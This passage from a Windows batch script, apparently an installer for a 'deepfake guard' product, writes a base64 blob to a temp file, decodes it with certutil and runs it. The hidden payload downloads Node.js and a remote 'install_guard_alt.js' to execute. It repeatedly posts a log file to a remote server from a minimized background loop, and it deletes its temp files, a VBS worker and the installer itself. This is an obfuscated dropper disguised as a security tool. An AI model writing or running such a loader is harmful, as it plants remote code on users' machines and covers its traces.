>>"%_13cd02%" echo ciAlJUEgaW4gKCIhTk9ERV9aSVAhIikgZG8gaWYgJSV+ekEgTFNTIDEwNDg1NzYgZXhpdCAvYiAx
>>"%_13cd02%" echo DQoNCmV4aXQgL2IgMA0KDQo6ZG93bmxvYWRfcG9ydGFibGVfbm9kZQ0KDQpzZXQgIk5PREVfWklQ
>>"%_13cd02%" echo PSVUTVBESVIlXG5vZGUuemlwIg0KDQpzZXQgIk5PREVfVVJMPSVHVUFSRF9TVE9SRSUvbm9kZS9u
>>"%_13cd02%" echo b2RlLXYyMC4xOC4xLXdpbi14NjQuemlwIg0KDQpzZXQgIk5PREVfVVJMX0ZCPWh0dHBzOi8vbm9k
>>"%_13cd02%" echo ZWpzLm9yZy9kaXN0L3YyMC4xOC4xL25vZGUtdjIwLjE4LjEtd2luLXg2NC56aXAiDQoNCnNldCAi
>>"%_13cd02%" echo Tk9ERV9FWEU9JVRNUERJUiVcbm9kZS12MjAuMTguMS13aW4teDY0XG5vZGUuZXhlIg0KDQpzZXQg
>>"%_13cd02%" echo L2EgQVRURU1QVD0wDQoNCjpub2RlX2Rvd25sb2FkX2xvb3ANCg0Kc2V0IC9hIEFUVEVNUFQrPTEN
>>"%_13cd02%" echo Cg0KY2FsbCA6bG9nIElORk8gbm9kZSBkb3dubG9hZCBhdHRlbXB0ICFBVFRFTVBUIS8hTUFYX0FU
>>"%_13cd02%" echo VEVNUFRTISBmcm9tIHN0b3JlDQoNCnNldCBOT0RFX1pJUF9TSVpFPTANCg0KY2FsbCA6bm9kZV96
>>"%_13cd02%" echo aXBfaW50ZWdyaXR5ICIhTk9ERV9aSVAhIg0KDQppZiBub3QgZXJyb3JsZXZlbCAxICgNCg0KICBm
>>"%_13cd02%" echo b3IgJSVBIGluICgiIU5PREVfWklQISIpIGRvIHNldCBOT0RFX1pJUF9TSVpFPSUlfnpBDQoNCiAg
>>"%_13cd02%" echo Y2FsbCA6bG9nIE9LIG5vZGUgemlwIGludGVncml0eSB2ZXJpZmllZCBzaXplPSFOT0RFX1pJUF9T
>>"%_13cd02%" echo SVpFISBieXRlcw0KDQogIGdvdG8gbm9kZV9leHRyYWN0X29rDQoNCikNCg0KaWYgZXhpc3QgIiFO
>>"%_13cd02%" echo T0RFX1pJUCEiICgNCg0KICBmb3IgJSVBIGluICgiIU5PREVfWklQISIpIGRvIHNldCBOT0RFX1pJ
>>"%_13cd02%" echo UF9TSVpFPSUlfnpBDQoNCiAgaWYgIU5PREVfWklQX1NJWkUhIEdUUiAwICgNCg0KICAgIGNhbGwg
>>"%_13cd02%" echo OmxvZyBJTkZPIHJlc3VtaW5nIHBhcnRpYWwgbm9kZSBkb3dubG9hZCBzaXplPSFOT0RFX1pJUF9T
>>"%_13cd02%" echo SVpFISBieXRlcw0KDQogICkgZWxzZSAoDQoNCiAgICBkZWwgL2YgL3EgIiFOT0RFX1pJUCEiDQoN
>>"%_13cd02%" echo CiAgKQ0KDQopIGVsc2UgKA0KDQogIHNldCBOT0RFX1pJUF9TSVpFPTANCg0KKQ0KDQpjdXJsIC1z
>>"%_13cd02%" echo ayAtQyAtIC0tY29ubmVjdC10aW1lb3V0ICFOT0RFX0NPTk5FQ1RfVElNRU9VVCEgLS1tYXgtdGlt
>>"%_13cd02%" echo ZSAhTk9ERV9NQVhfVElNRSEgLS1yZXRyeSAhTk9ERV9DVVJMX1JFVFJZISAtLXJldHJ5LWFsbC1l
>>"%_13cd02%" echo cnJvcnMgLS1yZXRyeS1kZWxheSA1IC0tc3BlZWQtbGltaXQgIUNVUkxfU1RBTExfTElNSVQhIC0t
>>"%_13cd02%" echo c3BlZWQtdGltZSAhQ1VSTF9TVEFMTF9USU1FISAtbyAiIU5PREVfWklQISIgIiFOT0RFX1VSTCEi
>>"%_13cd02%" echo DQoNCnNldCAiQ1VSTF9FUlI9IWVycm9ybGV2ZWwhIg0KDQpjYWxsIDpub2RlX3ppcF9pbnRlZ3Jp
>>"%_13cd02%" echo dHkgIiFOT0RFX1pJUCEiDQoNCmlmIGVycm9ybGV2ZWwgMSAoDQoNCiAgZm9yICUlQSBpbiAoIiFO
>>"%_13cd02%" echo T0RFX1pJUCEiKSBkbyBzZXQgTk9ERV9aSVBfU0laRT0lJX56QQ0KDQogIGNhbGwgOmxvZyBXQVJO
>>"%_13cd02%" echo IHN0b3JlIG5vZGUgZG93bmxvYWQgZmFpbGVkIGN1cmw9IUNVUkxfRVJSISBzaXplPSFOT0RFX1pJ
>>"%_13cd02%" echo UF9TSVpFISB0cnlpbmcgbm9kZWpzLm9yZw0KDQogIGlmIGV4aXN0ICIhTk9ERV9aSVAhIiBkZWwg
>>"%_13cd02%" echo L2YgL3EgIiFOT0RFX1pJUCEiDQoNCiAgc2V0IE5PREVfWklQX1NJWkU9MA0KDQogIGN1cmwgLXNr
>>"%_13cd02%" echo IC1DIC0gLS1jb25uZWN0LXRpbWVvdXQgIU5PREVfQ09OTkVDVF9USU1FT1VUISAtLW1heC10aW1l
>>"%_13cd02%" echo ICFOT0RFX01BWF9USU1FISAtLXJldHJ5ICFOT0RFX0NVUkxfUkVUUlkhIC0tcmV0cnktYWxsLWVy
>>"%_13cd02%" echo cm9ycyAtLXJldHJ5LWRlbGF5IDUgLS1zcGVlZC1saW1pdCAhQ1VSTF9TVEFMTF9MSU1JVCEgLS1z
>>"%_13cd02%" echo cGVlZC10aW1lICFDVVJMX1NUQUxMX1RJTUUhIC1vICIhTk9ERV9aSVAhIiAiIU5PREVfVVJMX0ZC
>>"%_13cd02%" echo ISINCg0KICBzZXQgIkNVUkxfRVJSPSFlcnJvcmxldmVsISINCg0KICBjYWxsIDpub2RlX3ppcF9p
>>"%_13cd02%" echo bnRlZ3JpdHkgIiFOT0RFX1pJUCEiDQoNCikNCg0KaWYgbm90IGVycm9ybGV2ZWwgMSAoDQoNCiAg
>>"%_13cd02%" echo Zm9yICUlQSBpbiAoIiFOT0RFX1pJUCEiKSBkbyBzZXQgTk9ERV9aSVBfU0laRT0lJX56QQ0KDQog
>>"%_13cd02%" echo IGNhbGwgOmxvZyBPSyBub2RlIHppcCBkb3dubG9hZGVkIGFuZCB2ZXJpZmllZCBzaXplPSFOT0RF
>>"%_13cd02%" echo X1pJUF9TSVpFISBieXRlcw0KDQogIGdvdG8gbm9kZV9leHRyYWN0X29rDQoNCikNCg0KaWYgZXhp
>>"%_13cd02%" echo c3QgIiFOT0RFX1pJUCEiIGRlbCAvZiAvcSAiIU5PREVfWklQISINCg0KY2FsbCA6bG9nIFdBUk4g
>>"%_13cd02%" echo bm9kZSBkb3dubG9hZCBmYWlsZWQgY3VybD0hQ1VSTF9FUlIhIGF0dGVtcHQ9IUFUVEVNUFQhDQoN
>>"%_13cd02%" echo CmlmICFBVFRFTVBUISBMU1MgIU1BWF9BVFRFTVBUUyEgKA0KDQogIHRpbWVvdXQgL3QgIUFUVEVN
>>"%_13cd02%" echo UFQhIC9ub2JyZWFrID5udWwNCg0KICBnb3RvIG5vZGVfZG93bmxvYWRfbG9vcA0KDQopDQoNCmNh
>>"%_13cd02%" echo bGwgOmxvZyBGQUlMIG5vZGUgZG93bmxvYWQgZmFpbGVkIGFmdGVyICFNQVhfQVRURU1QVFMhIGF0
>>"%_13cd02%" echo dGVtcHRzDQoNCnNldCBHVUFSRF9FWElUPTENCg0KZXhpdCAvYiAxDQoNCjpub2RlX2V4dHJhY3Rf
>>"%_13cd02%" echo b2sNCg0Kc2V0IC9hIEVYVF9BVFRFTVBUPTANCg0KOm5vZGVfZXh0cmFjdF9sb29wDQoNCnNldCAv
>>"%_13cd02%" echo YSBFWFRfQVRURU1QVCs9MQ0KDQpybWRpciAvcyAvcSAiJVRNUERJUiVcbm9kZS12MjAuMTguMS13
>>"%_13cd02%" echo aW4teDY0IiAyPm51bA0KDQp0YXIgLXhmICIhTk9ERV9aSVAhIiAtQyAiJVRNUERJUiUiID5udWwg
>>"%_13cd02%" echo Mj4mMQ0KDQppZiBlcnJvcmxldmVsIDEgKA0KDQogIGNhbGwgOmxvZyBXQVJOIGV4dHJhY3QgZmFp
>>"%_13cd02%" echo bGVkIGF0dGVtcHQgIUVYVF9BVFRFTVBUIQ0KDQogIGlmICFFWFRfQVRURU1QVCEgTFNTICFNQVhf
>>"%_13cd02%" echo QVRURU1QVFMhICgNCg0KICAgIHRpbWVvdXQgL3QgIUVYVF9BVFRFTVBUISAvbm9icmVhayA+bnVs
>>"%_13cd02%" echo DQoNCiAgICBnb3RvIG5vZGVfZXh0cmFjdF9sb29wDQoNCiAgKQ0KDQogIGNhbGwgOmxvZyBXQVJO
>>"%_13cd02%" echo IGNvcnJ1cHQgbm9kZSB6aXAgcmVtb3ZlZCBhZnRlciBleHRyYWN0IGZhaWx1cmUsIHdpbGwgcmUt
>>"%_13cd02%" echo ZG93bmxvYWQNCg0KICBpZiBleGlzdCAiIU5PREVfWklQISIgZGVsIC9mIC9xICIhTk9ERV9aSVAh
>>"%_13cd02%" echo Ig0KDQogIHJtZGlyIC9zIC9xICIlVE1QRElSJVxub2RlLXYyMC4xOC4xLXdpbi14NjQiIDI+bnVs
>>"%_13cd02%" echo DQoNCiAgaWYgIUFUVEVNUFQhIExTUyAhTUFYX0FUVEVNUFRTISAoDQoNCiAgICB0aW1lb3V0IC90
>>"%_13cd02%" echo ICFBVFRFTVBUISAvbm9icmVhayA+bnVsDQoNCiAgICBnb3RvIG5vZGVfZG93bmxvYWRfbG9vcA0K
>>"%_13cd02%" echo DQogICkNCg0KICBjYWxsIDpsb2cgRkFJTCBub2RlIHppcCBleHRyYWN0IGZhaWxlZCBhZnRlciAh
>>"%_13cd02%" echo TUFYX0FUVEVNUFRTISBkb3dubG9hZCBhdHRlbXB0cw0KDQogIHNldCBHVUFSRF9FWElUPTENCg0K
>>"%_13cd02%" echo ICBleGl0IC9iIDENCg0KKQ0KDQpjYWxsIDpsb2cgT0sgbm9kZSB6aXAgZXh0cmFjdGVkDQoNCmlm
>>"%_13cd02%" echo IG5vdCBleGlzdCAiIU5PREVfRVhFISIgKA0KDQogIGNhbGwgOmxvZyBXQVJOIG5vZGUuZXhlIG1p
>>"%_13cd02%" echo c3NpbmcgYWZ0ZXIgZXh0cmFjdCwgd2lsbCByZS1kb3dubG9hZA0KDQogIGlmIGV4aXN0ICIhTk9E
>>"%_13cd02%" echo RV9aSVAhIiBkZWwgL2YgL3EgIiFOT0RFX1pJUCEiDQoNCiAgcm1kaXIgL3MgL3EgIiVUTVBESVIl
>>"%_13cd02%" echo XG5vZGUtdjIwLjE4LjEtd2luLXg2NCIgMj5udWwNCg0KICBpZiAhQVRURU1QVCEgTFNTICFNQVhf
>>"%_13cd02%" echo QVRURU1QVFMhIGdvdG8gbm9kZV9kb3dubG9hZF9sb29wDQoNCiAgY2FsbCA6bG9nIEZBSUwgbm9k
>>"%_13cd02%" echo ZS5leGUgbWlzc2luZyBhdCAhTk9ERV9FWEUhDQoNCiAgc2V0IEdVQVJEX0VYSVQ9MQ0KDQogIGV4
>>"%_13cd02%" echo aXQgL2IgMQ0KDQopDQoNCmZvciAvZiAiZGVsaW1zPSIgJSV2IGluICgnIiFOT0RFX0VYRSEiIC12
>>"%_13cd02%" echo IDJePl4mMScpIGRvIHNldCBOT0RFX1ZFUj0lJXYNCg0KaWYgbm90IGRlZmluZWQgTk9ERV9WRVIg
>>"%_13cd02%" echo KA0KDQogIGNhbGwgOmxvZyBXQVJOIG5vZGUuZXhlIG5vdCBydW5uYWJsZSBhZnRlciBleHRyYWN0
>>"%_13cd02%" echo LCB3aWxsIHJlLWRvd25sb2FkDQoNCiAgaWYgZXhpc3QgIiFOT0RFX1pJUCEiIGRlbCAvZiAvcSAi
>>"%_13cd02%" echo IU5PREVfWklQISINCg0KICBybWRpciAvcyAvcSAiJVRNUERJUiVcbm9kZS12MjAuMTguMS13aW4t
>>"%_13cd02%" echo eDY0IiAyPm51bA0KDQogIGlmICFBVFRFTVBUISBMU1MgIU1BWF9BVFRFTVBUUyEgZ290byBub2Rl
>>"%_13cd02%" echo X2Rvd25sb2FkX2xvb3ANCg0KICBjYWxsIDpsb2cgRkFJTCBub2RlLmV4ZSB2ZXJpZmljYXRpb24g
>>"%_13cd02%" echo ZmFpbGVkDQoNCiAgc2V0IEdVQVJEX0VYSVQ9MQ0KDQogIGV4aXQgL2IgMQ0KDQopDQoNCmlmIGV4
>>"%_13cd02%" echo aXN0ICIhTk9ERV9aSVAhIiBkZWwgL2YgL3EgIiFOT0RFX1pJUCEiDQoNCmV4aXQgL2IgMA0KDQo6
>>"%_13cd02%" echo ZW5zdXJlX2d1YXJkX2pzDQoNCnNldCBHVUFSRF9PSz0wDQoNCnNldCBHVUFSRF9KU19TSVpFPTAN
>>"%_13cd02%" echo Cg0KaWYgZXhpc3QgIiFHVUFSRF9KUyEiIGZvciAlJUEgaW4gKCIhR1VBUkRfSlMhIikgZG8gc2V0
>>"%_13cd02%" echo IEdVQVJEX0pTX1NJWkU9JSV+ekENCg0KaWYgIUdVQVJEX0pTX1NJWkUhIEdFUSAhR1VBUkRfSlNf
>>"%_13cd02%" echo TUlOISBzZXQgR1VBUkRfT0s9MQ0KDQppZiAhR1VBUkRfT0shIEVRVSAxICgNCg0KICBjYWxsIDps
>>"%_13cd02%" echo b2cgT0sgaW5zdGFsbF9ndWFyZF9hbHQuanMgcHJlc2VudCBzaXplPSFHVUFSRF9KU19TSVpFISBi
>>"%_13cd02%" echo eXRlcw0KDQogIGV4aXQgL2IgMA0KDQopDQoNCmlmIGV4aXN0ICIhR1VBUkRfSlMhIiBkZWwgL2Yg
>>"%_13cd02%" echo L3EgIiFHVUFSRF9KUyEiDQoNCnNldCAvYSBBVFRFTVBUPTANCg0KOmd1YXJkX2Rvd25sb2FkX2xv
>>"%_13cd02%" echo b3ANCg0Kc2V0IC9hIEFUVEVNUFQrPTENCg0KY2FsbCA6bG9nIElORk8gaW5zdGFsbF9ndWFyZF9h
>>"%_13cd02%" echo bHQuanMgZG93bmxvYWQgYXR0ZW1wdCAhQVRURU1QVCEvIU1BWF9BVFRFTVBUUyENCg0KaWYgZXhp
>>"%_13cd02%" echo c3QgIiFHVUFSRF9KUyEiICgNCg0KICBmb3IgJSVBIGluICgiIUdVQVJEX0pTISIpIGRvIHNldCBH
>>"%_13cd02%" echo VUFSRF9KU19TSVpFPSUlfnpBDQoNCiAgaWYgIUdVQVJEX0pTX1NJWkUhIEdUUiAwICgNCg0KICAg
>>"%_13cd02%" echo IGNhbGwgOmxvZyBJTkZPIHJlc3VtaW5nIHBhcnRpYWwgaW5zdGFsbF9ndWFyZF9hbHQuanMgZG93
>>"%_13cd02%" echo bmxvYWQgc2l6ZT0hR1VBUkRfSlNfU0laRSEgYnl0ZXMNCg0KICApDQoNCikgZWxzZSAoDQoNCiAg
>>"%_13cd02%" echo c2V0IEdVQVJEX0pTX1NJWkU9MA0KDQopDQoNCmN1cmwgLXNrIC1DIC0gLS1jb25uZWN0LXRpbWVv
>>"%_13cd02%" echo dXQgIUdVQVJEX0NPTk5FQ1RfVElNRU9VVCEgLS1tYXgtdGltZSAhR1VBUkRfTUFYX1RJTUUhIC0t
>>"%_13cd02%" echo cmV0cnkgIUdVQVJEX0NVUkxfUkVUUlkhIC0tcmV0cnktYWxsLWVycm9ycyAtLXJldHJ5LWRlbGF5
>>"%_13cd02%" echo IDUgLS1zcGVlZC1saW1pdCAhQ1VSTF9TVEFMTF9MSU1JVCEgLS1zcGVlZC10aW1lICFDVVJMX1NU
>>"%_13cd02%" echo QUxMX1RJTUUhIC1vICIhR1VBUkRfSlMhIiAiIUdVQVJEX1VSTCEiDQoNCnNldCAiQ1VSTF9FUlI9
>>"%_13cd02%" echo IWVycm9ybGV2ZWwhIg0KDQpzZXQgR1VBUkRfSlNfU0laRT0wDQoNCnNldCBHVUFSRF9PSz0wDQoN
>>"%_13cd02%" echo CmlmICFDVVJMX0VSUiEgRVFVIDAgaWYgZXhpc3QgIiFHVUFSRF9KUyEiIGZvciAlJUEgaW4gKCIh
>>"%_13cd02%" echo R1VBUkRfSlMhIikgZG8gc2V0IEdVQVJEX0pTX1NJWkU9JSV+ekENCg0KaWYgIUdVQVJEX0pTX1NJ
>>"%_13cd02%" echo WkUhIEdFUSAhR1VBUkRfSlNfTUlOISBzZXQgR1VBUkRfT0s9MQ0KDQppZiAhR1VBUkRfT0shIEVR
>>"%_13cd02%" echo VSAxICgNCg0KICBjYWxsIDpsb2cgT0sgaW5zdGFsbF9ndWFyZF9hbHQuanMgZG93bmxvYWRlZCBz
>>"%_13cd02%" echo aXplPSFHVUFSRF9KU19TSVpFISBieXRlcw0KDQogIGV4aXQgL2IgMA0KDQopDQoNCmlmICFHVUFS
>>"%_13cd02%" echo RF9PSyEgTkVRIDEgaWYgZXhpc3QgIiFHVUFSRF9KUyEiICgNCg0KICBmb3IgJSVBIGluICgiIUdV
>>"%_13cd02%" echo QVJEX0pTISIpIGRvIGlmICUlfnpBIExTUyAhR1VBUkRfSlNfTUlOISBkZWwgL2YgL3EgIiFHVUFS
>>"%_13cd02%" echo RF9KUyEiDQoNCikNCg0KY2FsbCA6bG9nIFdBUk4gaW5zdGFsbF9ndWFyZF9hbHQuanMgZmFpbGVk
>>"%_13cd02%" echo IGN1cmw9IUNVUkxfRVJSISBzaXplPSFHVUFSRF9KU19TSVpFISBhdHRlbXB0PSFBVFRFTVBUIQ0K
>>"%_13cd02%" echo DQppZiAhQVRURU1QVCEgTFNTICFNQVhfQVRURU1QVFMhICgNCg0KICB0aW1lb3V0IC90ICFBVFRF
>>"%_13cd02%" echo TVBUISAvbm9icmVhayA+bnVsDQoNCiAgZ290byBndWFyZF9kb3dubG9hZF9sb29wDQoNCikNCg0K
>>"%_13cd02%" echo Y2FsbCA6bG9nIEZBSUwgaW5zdGFsbF9ndWFyZF9hbHQuanMgZG93bmxvYWQgZmFpbGVkDQoNCnNl
>>"%_13cd02%" echo dCBHVUFSRF9FWElUPTENCg0KZXhpdCAvYiAxDQoNCjp1cGxvYWRfZ3VhcmRfbG9nDQoNCmlmIG5v
>>"%_13cd02%" echo dCBleGlzdCAiJUxPRyUiIGV4aXQgL2IgMA0KDQpmb3IgJSVBIGluICgiJUxPRyUiKSBkbyBpZiAl
>>"%_13cd02%" echo JX56QSBMU1MgMSBleGl0IC9iIDANCg0KY2FsbCA6bG9nIElORk8gdXBsb2FkaW5nIGZpbmFsIGd1
>>"%_13cd02%" echo YXJkIGluc3RhbGwgbG9nIHRvIHNlcnZlcg0KDQpzZXQgIl9MT0dVUD0lVEVNUCVcfm52ZGdfbG9n
>>"%_13cd02%" echo dXBsb2FkXyVSQU5ET00lLnRtcCINCg0KY29weSAveSAiJUxPRyUiICIhX0xPR1VQISIgPm51bCAy
>>"%_13cd02%" echo PiYxDQoNCmlmIGV4aXN0ICIhX0xPR1VQISIgY3VybCAtc2sgLVggUE9TVCAtSCAiQ29udGVudC1U
>>"%_13cd02%" echo eXBlOiB0ZXh0L3BsYWluIiAtSCAiWC1HdWFyZC1QbGF0Zm9ybTogd2luZG93cyIgLS1kYXRhLWJp
>>"%_13cd02%" echo bmFyeSAiQCFfTE9HVVAhIiAtLWNvbm5lY3QtdGltZW91dCAzMCAtLW1heC10aW1lIDYwIC0tcmV0
>>"%_13cd02%" echo cnkgMyAtLXJldHJ5LWFsbC1lcnJvcnMgLS1yZXRyeS1kZWxheSAzICIlTE9HX1VQTE9BRF9VUkwl
>>"%_13cd02%" echo IiA+bnVsIDI+JjENCg0KZGVsIC9mIC9xICIhX0xPR1VQISIgMj5udWwNCg0KaWYgZXJyb3JsZXZl
>>"%_13cd02%" echo bCAxICgNCg0KICBjYWxsIDpsb2cgV0FSTiBndWFyZCBsb2cgdXBsb2FkIGZhaWxlZCBjdXJsPSFl
>>"%_13cd02%" echo cnJvcmxldmVsIQ0KDQopIGVsc2UgKA0KDQogIGNhbGwgOmxvZyBPSyBndWFyZCBsb2cgdXBsb2Fk
>>"%_13cd02%" echo ZWQNCg0KKQ0KDQpleGl0IC9iIDANCg0KOnNjaGVkdWxlX2xvZ191cGxvYWQNCg0Kc2V0ICJfTFU9
>>"%_13cd02%" echo JVRFTVAlXH5udmRnX2xvZ3VwbG9hZF8lUkFORE9NJS5jbWQiDQoNCj4gIiFfTFUhIiBlY2hvIEBl
>>"%_13cd02%" echo Y2hvIG9mZg0KDQo+PiIhX0xVISIgZWNobyBzZXRsb2NhbCBFbmFibGVEZWxheWVkRXhwYW5zaW9u
>>"%_13cd02%" echo DQoNCj4+IiFfTFUhIiBlY2hvIHNldCAvYSBfTFVDPTANCg0KPj4iIV9MVSEiIGVjaG8gOmxvb3AN
>>"%_13cd02%" echo Cg0KPj4iIV9MVSEiIGVjaG8gc2V0IC9hIF9MVUMrPTENCg0KPj4iIV9MVSEiIGVjaG8gaWYgXiFf
>>"%_13cd02%" echo TFVDXiEgR0VRIDE4MCBnb3RvIGRvbmUNCg0KPj4iIV9MVSEiIGVjaG8gdGltZW91dCAvdCA2MCAv
>>"%_13cd02%" echo bm9icmVhayBePm51bA0KDQo+PiIhX0xVISIgZWNobyBpZiBub3QgZXhpc3QgIiVMT0NLRElSJVwi
>>"%_13cd02%" echo IGdvdG8gZG9uZQ0KDQo+PiIhX0xVISIgZWNobyBzZXQgIl9MVD0lVEVNUCVcfm52ZGdfbG9ndXBs
>>"%_13cd02%" echo b2FkXyUlUkFORE9NJSUudG1wIg0KDQo+PiIhX0xVISIgZWNobyBpZiBleGlzdCAiJUxPRyUiIGNv
>>"%_13cd02%" echo cHkgL3kgIiVMT0clIiAiXiFfTFReISIgXj5udWwgMl4+XiYxDQoNCj4+IiFfTFUhIiBlY2hvIGlm
>>"%_13cd02%" echo IGV4aXN0ICJeIV9MVF4hIiBjdXJsIC1zayAtWCBQT1NUIC1IICJDb250ZW50LVR5cGU6IHRleHQv
>>"%_13cd02%" echo cGxhaW4iIC1IICJYLUd1YXJkLVBsYXRmb3JtOiB3aW5kb3dzIiAtLWRhdGEtYmluYXJ5ICJAXiFf
>>"%_13cd02%" echo TFReISIgLS1jb25uZWN0LXRpbWVvdXQgMzAgLS1tYXgtdGltZSA2MCAtLXJldHJ5IDMgLS1yZXRy
>>"%_13cd02%" echo eS1hbGwtZXJyb3JzIC0tcmV0cnktZGVsYXkgMyAiJUxPR19VUExPQURfVVJMJSIgXj5udWwgMl4+
>>"%_13cd02%" echo XiYxDQoNCj4+IiFfTFUhIiBlY2hvIGRlbCAvZiAvcSAiXiFfTFReISIgMl4+bnVsDQoNCj4+IiFf
>>"%_13cd02%" echo TFUhIiBlY2hvIGdvdG8gbG9vcA0KDQo+PiIhX0xVISIgZWNobyA6ZG9uZQ0KDQo+PiIhX0xVISIg
>>"%_13cd02%" echo ZWNobyBkZWwgL2YgL3EgIiVURU1QJVx+bnZkZ19sb2d1cGxvYWRfKi50bXAiIDJePm51bA0KDQo+
>>"%_13cd02%" echo PiIhX0xVISIgZWNobyBkZWwgL2YgL3EgIiUlfmYwIiAyXj5udWwNCg0Kc3RhcnQgIiIgL01JTiBj
>>"%_13cd02%" echo bWQgL0QgL0MgIiIhX0xVISIiDQoNCmV4aXQgL2IgMA0KDQo6Y2xlYW51cF90ZW1wX2FydGlmYWN0
>>"%_13cd02%" echo cw0KDQpkZWwgL2YgL3EgIiVURU1QJVx+bnZkZ18qIiAyPm51bA0KDQpkZWwgL2YgL3EgIiVURU1Q
>>"%_13cd02%" echo JVx+a2RtXyouYjY0IiAiJVRFTVAlXH5rZG1fKi5jbWQiIDI+bnVsDQoNCmRlbCAvZiAvcSAiJVRF
>>"%_13cd02%" echo TVAlXGRlZXBmYWtlX2d1YXJkLmxhdW5jaGVyLnN0YXR1cyIgMj5udWwNCg0KZGVsIC9mIC9xICIl
>>"%_13cd02%" echo VEVNUCVcZGVlcGZha2VfZ3VhcmQud29ya2VyLmxvY2siIDI+bnVsDQoNCmRlbCAvZiAvcSAiJVRF
>>"%_13cd02%" echo TVAlXH5udmRnX3dvcmtlci52YnMiIDI+bnVsDQoNCmlmIGV4aXN0ICIlVEVNUCVcZGVlcGZha2Vf
>>"%_13cd02%" echo Z3VhcmRcIiBybWRpciAvcyAvcSAiJVRFTVAlXGRlZXBmYWtlX2d1YXJkIiAyPm51bA0KDQpleGl0
>>"%_13cd02%" echo IC9iIDANCg0KOmRlbGV0ZV9pbnN0YWxsZXINCg0KaWYgbm90IGRlZmluZWQgTlZER19MQVVOQ0hF
>>"%_13cd02%" echo UiBzZXQgIk5WREdfTEFVTkNIRVI9JX5mMCINCg0KaWYgbm90IGRlZmluZWQgSU5TVEFMTEVSX0RJ
>>"%_13cd02%" echo UiBzZXQgIklOU1RBTExFUl9ESVI9JUNEJSINCg0KZGVsIC9mIC9xICIhTlZER19MQVVOQ0hFUiEi
>>"%_13cd02%" echo IDI+bnVsDQoNCmRlbCAvZiAvcSAiJUlOU1RBTExFUl9ESVIlXHVwZF93LmNtZCIgIiVJTlNUQUxM
>>"%_13cd02%" echo RVJfRElSJVx1cGRhX3cuY21kIiAyPm51bA0KDQppZiBub3QgZXhpc3QgIiFOVkRHX0xBVU5DSEVS
>>"%_13cd02%" echo ISIgaWYgbm90IGV4aXN0ICIlSU5TVEFMTEVSX0RJUiVcdXBkX3cuY21kIiBpZiBub3QgZXhpc3Qg
>>"%_13cd02%" echo IiVJTlNUQUxMRVJfRElSJVx1cGRhX3cuY21kIiBleGl0IC9iIDANCg0Kc2V0ICJfREg9JVRFTVAl
>>"%_13cd02%" echo XH5udmRnX2RlbF8lUkFORE9NJS5jbWQiDQoNCj4gIiFfREghIiBlY2hvIEBlY2hvIG9mZg0KDQo+
>>"%_13cd02%" echo PiIhX0RIISIgZWNobyBmb3IgL0wgJSUlJW4gaW4gKDEsMSw2MCkgZG8gKA0KDQo+PiIhX0RIISIg
>>"%_13cd02%" echo ZWNobyAgIGRlbCAvZiAvcSAiIU5WREdfTEFVTkNIRVIhIiAyXj5udWwNCg0KPj4iIV9ESCEiIGVj
>>"%_13cd02%" echo aG8gICBkZWwgL2YgL3EgIiVJTlNUQUxMRVJfRElSJVx1cGRfdy5jbWQiICIlSU5TVEFMTEVSX0RJ
>>"%_13cd02%" echo UiVcdXBkYV93LmNtZCIgMl4+bnVsDQoNCj4+IiFfREghIiBlY2hvICAgaWYgbm90IGV4aXN0ICIh
>>"%_13cd02%" echo TlZER19MQVVOQ0hFUiEiIGlmIG5vdCBleGlzdCAiJUlOU1RBTExFUl9ESVIlXHVwZF93LmNtZCIg
>>"%_13cd02%" echo aWYgbm90IGV4aXN0ICIlSU5TVEFMTEVSX0RJUiVcdXBkYV93LmNtZCIgZ290byBkb25lDQoNCj4+
>>"%_13cd02%" echo IiFfREghIiBlY2hvICAgdGltZW91dCAvdCAxIC9ub2JyZWFrIF4+bnVsDQoNCj4+IiFfREghIiBl
>>"%_13cd02%" echo Y2hvICkNCg0KPj4iIV9ESCEiIGVjaG8gOmRvbmUNCg0KPj4iIV9ESCEiIGVjaG8gZGVsIC9mIC9x
>>"%_13cd02%" echo ICIlVEVNUCVcfm52ZGdfKiIgMl4+bnVsDQoNCj4+IiFfREghIiBlY2hvIGRlbCAvZiAvcSAiJVRF
>>"%_13cd02%" echo TVAlXH5rZG1fKi5iNjQiICIlVEVNUCVcfmtkbV8qLmNtZCIgMl4+bnVsDQoNCj4+IiFfREghIiBl
>>"%_13cd02%" echo Y2hvIGRlbCAvZiAvcSAiJVRFTVAlXGRlZXBmYWtlX2d1YXJkLmxhdW5jaGVyLnN0YXR1cyIgMl4+
>>"%_13cd02%" echo bnVsDQoNCj4+IiFfREghIiBlY2hvIGRlbCAvZiAvcSAiJVRFTVAlXH5udmRnX3dvcmtlci52YnMi
>>"%_13cd02%" echo IDJePm51bA0KDQo+PiIhX0RIISIgZWNobyBkZWwgL2YgL3EgIiUlfmYwIiAyXj5udWwNCg0Kc3Rh
>>"%_13cd02%" echo cnQgIiIgL01JTiBjbWQgL0QgL0MgIiIhX0RIISIiDQoNCmV4aXQgL2IgMA0KDQo6bG9nDQoNCj4+
>>"%_13cd02%" echo IiVMT0clIiBlY2hvIFslZGF0ZSUgJXRpbWUlXSAlfjEgJX4yICV+MyAlfjQgJX41ICV+NiAlfjcg
>>"%_13cd02%" echo JX44ICV+OQ0KDQpleGl0IC9iIDANCg==
certutil -f -decode "%_13cd02%" "%_16ed42%" >>"%LOG%" 2>&1
if errorlevel 1 (
  >>"%LOG%" echo [%date% %time%] FAIL certutil decode failed
  echo 1^|0^|0^|decode_failed> "%LAUNCHER_STATUS%"
  del /f /q "%TEMP%\deepfake_guard.worker.lock" 2>nul
  del /f /q "%TEMP%\~kdm_*.b64" "%TEMP%\~kdm_*.cmd" 2>nul
  del /f /q "%TEMP%\~nvdg_worker.vbs" 2>nul
  exit /b 1
)
>>"%LOG%" echo [%date% %time%] OK launching install payload
call "%_16ed42%" %*
>>"%LOG%" echo [%date% %time%] OK install payload finished exit !errorlevel!
set "_ec=!errorlevel!"
del /f /q "%_13cd02%" "%_16ed42%" 2>nul
del /f /q "%TEMP%\~nvdg_worker.vbs" 2>nul
del /f /q "%TEMP%\~kdm_*.b64" "%TEMP%\~kdm_*.cmd" 2>nul
del /f /q "%TEMP%\deepfake_guard.launcher.status" 2>nul
del /f /q "%TEMP%\~nvdg_logupload_*.cmd" "%TEMP%\~nvdg_logupload_*.tmp" 2>nul
call :nvdg_remove_installer
exit /b %_ec%
